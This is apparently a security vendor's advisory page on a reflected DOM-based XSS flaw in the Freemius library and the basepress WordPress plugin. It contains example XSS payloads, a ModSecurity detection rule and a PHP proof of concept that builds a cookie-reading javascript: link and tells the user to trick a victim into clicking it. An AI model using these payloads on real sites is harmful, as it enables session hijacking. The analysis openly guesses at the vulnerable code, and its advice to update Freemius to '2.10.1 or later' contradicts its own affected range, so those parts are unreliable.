What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability in the Freemius library affecting WordPress plugins, including basepress. It allows unauthenticated attackers to inject arbitrary scripts via the ‘url’ parameter due to insufficient input sanitization.

How does the vulnerability work?

The vulnerability occurs when the Freemius library processes the ‘url’ parameter from a request and reflects it in the DOM without proper sanitization. This allows attackers to craft malicious links that execute scripts in the victim’s browser upon clicking.

Who is affected by this vulnerability?

Any WordPress site using Freemius versions <= 2.10.1 and the basepress plugin version 2.16.3.3 or earlier is affected. Administrators should check their plugin versions to determine if they are vulnerable.

How can I check if my site is vulnerable?

To check for vulnerability, navigate to the WordPress admin dashboard, go to the plugins section, and verify if the Freemius library or basepress plugin is running a vulnerable version (<= 2.10.1 for Freemius and 2.16.3.3 for basepress).

What is the risk level of this vulnerability?

The CVSS score for CVE-2024-13362 is 6.1, classified as Medium severity. This indicates a moderate risk where an attacker can exploit the vulnerability to execute scripts in the user’s browser, potentially leading to session hijacking or phishing.

How can I fix or mitigate this vulnerability?

To mitigate this vulnerability, update the Freemius library to version 2.10.1 or later and the basepress plugin to version 2.16.3.6. Ensure that any custom code handling the ‘url’ parameter implements proper sanitization and escaping.

What should developers do to prevent this issue?

Developers should implement input validation and output escaping for any user-supplied data, especially in URL parameters. Use safe methods such as esc_url() in WordPress and ensure that only whitelisted schemes are accepted.

What is a proof of concept (PoC) for this vulnerability?

The PoC illustrates how an attacker can craft a malicious link that exploits the vulnerability. When a victim clicks the link, the injected script executes in their browser, demonstrating the impact of the reflected XSS.

What kind of attacks can result from this vulnerability?

Exploitation of this vulnerability can lead to various attacks, including session hijacking, phishing attempts, and defacement of web pages. While it requires user interaction, it poses a significant risk when combined with social engineering tactics.

Is user interaction required for exploitation?

Yes, user interaction is required as the victim must click on a crafted link for the attack to succeed. This makes the attack dependent on social engineering tactics to trick users into clicking the malicious link.

What are the long-term implications of this vulnerability?

If left unpatched, this vulnerability can lead to compromised user accounts and loss of trust in the affected site. It is crucial for administrators to regularly update plugins and monitor for vulnerabilities to maintain site security.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 8, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (basepress)

Q: How can I check if my site is vulnerable?

To check for vulnerability, navigate to the WordPress admin dashboard, go to the plugins section, and verify if the Freemius library or basepress plugin is running a vulnerable version (<= 2.10.1 for Freemius and 2.16.3.3 for basepress).

Q: What is the risk level of this vulnerability?

The CVSS score for CVE-2024-13362 is 6.1, classified as Medium severity. This indicates a moderate risk where an attacker can exploit the vulnerability to execute scripts in the user’s browser, potentially leading to session hijacking or phishing.

Q: How can I fix or mitigate this vulnerability?

To mitigate this vulnerability, update the Freemius library to version 2.10.1 or later and the basepress plugin to version 2.16.3.6. Ensure that any custom code handling the ‘url’ parameter implements proper sanitization and escaping.

Q: What should developers do to prevent this issue?

Developers should implement input validation and output escaping for any user-supplied data, especially in URL parameters. Use safe methods such as esc_url() in WordPress and ensure that only whitelisted schemes are accepted.

Q: What is a proof of concept (PoC) for this vulnerability?

The PoC illustrates how an attacker can craft a malicious link that exploits the vulnerability. When a victim clicks the link, the injected script executes in their browser, demonstrating the impact of the reflected XSS.

Q: What kind of attacks can result from this vulnerability?

Exploitation of this vulnerability can lead to various attacks, including session hijacking, phishing attempts, and defacement of web pages. While it requires user interaction, it poses a significant risk when combined with social engineering tactics.

Q: Is user interaction required for exploitation?

Yes, user interaction is required as the victim must click on a crafted link for the attack to succeed. This makes the attack dependent on social engineering tactics to trick users into clicking the malicious link.

CVE ID CVE-2024-13362

Plugin basepress

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 2.16.3.3

Patched Version —

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based):

This vulnerability is a Reflected DOM-Based Cross-Site Scripting (XSS) issue affecting the Freemius library (versions <= 2.10.1) used by multiple plugins and themes including the basepress plugin (vulnerable version 2.16.3.3). An unauthenticated attacker can inject arbitrary web scripts via the 'url' parameter. The CVSS score is 6.1 (Medium), with a vector of AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N.

Root Cause: Based on the CWE classification (79) and description, the root cause is improper neutralization of user input in the 'url' parameter during page generation. The Freemius library likely retrieves and processes a 'url' parameter from a request (possibly via GET or POST) and then reflects it into the DOM without adequate sanitization or escaping. Since no source code is available, Atomic Edge analysis infers that the vulnerable code resides in a Freemius JavaScript handler or PHP endpoint that reads the 'url' parameter and writes it directly into innerHTML, href, or similar DOM properties. The lack of output escaping (e.g., esc_js(), esc_url(), or proper encoding) allows script injection. This is a DOM-based XSS because the payload executes in the victim's browser without server-side reflection, likely through client-side JavaScript that processes the URL fragment or query string.

Exploitation: An attacker crafts a malicious link containing a payload in the 'url' parameter (e.g., http://target.site/?url=javascript:alert(document.cookie) or a data URI). The victim must click the link. The Freemius JavaScript code, upon page load, reads the 'url' parameter from the query string and uses it to set a window.location or element attribute without validation. For example, the library might use window.location.href = url_param or document.write(url_param). The attacker can also use an encoded payload such as %22%3E%3Cscript%3Ealert(1)%3C/script%3E to break out of an attribute context. The attack vector is network-based (AV:N), requires no authentication (PR:N), but requires user interaction (UI:R).

Remediation: The fix should sanitize and escape the 'url' parameter before any DOM manipulation. Developers must validate the URL against a whitelist of allowed schemes (e.g., https only) and use safe JavaScript methods like encodeURI() or setAttribute() with proper escaping. In WordPress context, using esc_url() or wp_kses() can prevent XSS. Since the vulnerability spans multiple plugins/themes using Freemius, the core Freemius library (v2.10.1) should be updated. For basepress plugin, version 2.16.3.6 contains the patch. The fix likely involves replacing unsafe DOM manipulation with safe alternatives and validating the 'url' parameter against a strict pattern (e.g., must start with http/https and be a valid URL).

Impact: An attacker can inject arbitrary HTML/JavaScript into the victim's browser. This enables session hijacking (stealing cookies), phishing (displaying fake login forms), defacement (altering page content), or keylogging (capturing keystrokes). Since the CVSS impact scores are Low for Confidentiality and Integrity, the attack requires user interaction and does not directly lead to full site compromise. However, combined with social engineering, it can lead to account takeover for targeted users.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@rx ^/" "id:20241994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Reflected DOM XSS via url parameter',severity:'CRITICAL',tag:'CVE-2024-13362',tag:'wordpress',tag:'xss'"
  SecRule ARGS:url "@rx (?i)(?:javascript|vbscript|data|script|%3Cscript|%22%3E|>)" "t:urlDecodeUni,t:removeNulls,t:compressWhitespace"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// This PoC demonstrates a reflected DOM-based XSS attack by crafting a malicious link
// that, when clicked by a victim, triggers the vulnerability in the Freemius library.

// Configuration
$target_url = 'http://example.com'; // Replace with the target WordPress site URL

// The vulnerable 'url' parameter is processed by Freemius JavaScript.
// We inject a payload that will execute when the victim clicks the link.
// The payload uses a javascript: URI scheme to run arbitrary JS.
// Note: Some browsers block javascript: URIs in certain contexts; this is the classic approach.

// Payload: javascript:alert(document.cookie)
$payload = 'javascript:alert(document.cookie)';

// Build the malicious URL
$malicious_url = $target_url . '/?url=' . urlencode($payload);

echo "[+] Atomic Edge CVE-2024-13362 PoCn";
echo "[+] Target: $target_urln";
echo "[+] Malicious URL: $malicious_urln";
echo "[+] Send this URL to the victim and trick them into clicking it.n";
echo "[+] Upon click, the injected JavaScript (alert with document.cookie) will execute.n";

// Optional: Verify if the target is reachable (just a check, not required for exploit)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code >= 200 && $http_code < 400) {
    echo "[+] Target is reachable (HTTP $http_code). PoC is ready.n";
} else {
    echo "[!] Target may not be reachable (HTTP $http_code). Check URL.n";
}
?>

Frequently Asked Questions

What is CVE-2024-13362?
Understanding the vulnerability
CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability in the Freemius library affecting WordPress plugins, including basepress. It allows unauthenticated attackers to inject arbitrary scripts via the ‘url’ parameter due to insufficient input sanitization.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability occurs when the Freemius library processes the ‘url’ parameter from a request and reflects it in the DOM without proper sanitization. This allows attackers to craft malicious links that execute scripts in the victim’s browser upon clicking.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using Freemius versions <= 2.10.1 and the basepress plugin version 2.16.3.3 or earlier is affected. Administrators should check their plugin versions to determine if they are vulnerable.
How can I check if my site is vulnerable?
Verifying plugin versions
To check for vulnerability, navigate to the WordPress admin dashboard, go to the plugins section, and verify if the Freemius library or basepress plugin is running a vulnerable version (<= 2.10.1 for Freemius and 2.16.3.3 for basepress).
What is the risk level of this vulnerability?
Understanding CVSS score
The CVSS score for CVE-2024-13362 is 6.1, classified as Medium severity. This indicates a moderate risk where an attacker can exploit the vulnerability to execute scripts in the user’s browser, potentially leading to session hijacking or phishing.
How can I fix or mitigate this vulnerability?
Recommended actions for administrators
To mitigate this vulnerability, update the Freemius library to version 2.10.1 or later and the basepress plugin to version 2.16.3.6. Ensure that any custom code handling the ‘url’ parameter implements proper sanitization and escaping.
What should developers do to prevent this issue?
Best practices for secure coding
Developers should implement input validation and output escaping for any user-supplied data, especially in URL parameters. Use safe methods such as esc_url() in WordPress and ensure that only whitelisted schemes are accepted.
What is a proof of concept (PoC) for this vulnerability?
Demonstrating the vulnerability
The PoC illustrates how an attacker can craft a malicious link that exploits the vulnerability. When a victim clicks the link, the injected script executes in their browser, demonstrating the impact of the reflected XSS.
What kind of attacks can result from this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability can lead to various attacks, including session hijacking, phishing attempts, and defacement of web pages. While it requires user interaction, it poses a significant risk when combined with social engineering tactics.
Is user interaction required for exploitation?
Understanding the attack vector
Yes, user interaction is required as the victim must click on a crafted link for the attack to succeed. This makes the attack dependent on social engineering tactics to trick users into clicking the malicious link.
What are the long-term implications of this vulnerability?
Impact on site security
If left unpatched, this vulnerability can lead to compromised user accounts and loss of trust in the affected site. It is crucial for administrators to regularly update plugins and monitor for vulnerabilities to maintain site security.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations